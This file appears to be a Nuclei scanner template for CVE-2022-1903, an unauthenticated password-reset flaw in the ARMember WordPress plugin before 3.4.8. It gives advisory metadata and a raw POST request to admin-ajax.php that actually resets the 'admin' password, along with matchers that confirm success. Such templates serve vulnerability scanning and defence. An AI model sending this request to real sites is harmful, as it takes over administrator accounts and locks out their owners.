id: CVE-2022-1903 info: name: ARMember < 3.4.8 - Unauthenticated Admin Account Takeover author: theamanrawat severity: high description: | The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username. impact: | An attacker can gain unauthorized access to the admin account, potentially leading to further compromise of the system. remediation: Fixed in version 3.4.8 reference: - https://wpscan.com/vulnerability/28d26aa6-a8db-4c20-9ec7-39821c606a08 - https://wordpress.org/plugins/armember-membership/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1903 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2022-1903 cwe-id: CWE-862 epss-score: 0.40074 epss-percentile: 0.969 cpe: cpe:2.3:a:armemberplugin:armember:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: armemberplugin product: armember framework: wordpress tags: cve,cve2022,account-takeover,wpscan,wordpress,wp-plugin,wp,armember-membership,unauthenticated,armemberplugin http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin matchers-condition: and matchers: - type: word part: body words: - "Your Password has been reset" - "arm_success_msg" condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4b0a00483046022100d16642eec0006bdb049e8fa943e55e89a4c13aee1cfd5cf044744430819c3a21022100d5d28e43c312f56d3af53a5a1da86ad739c110a564f53279e06d336922238593:922c64590222798bb761d5b6d8e72950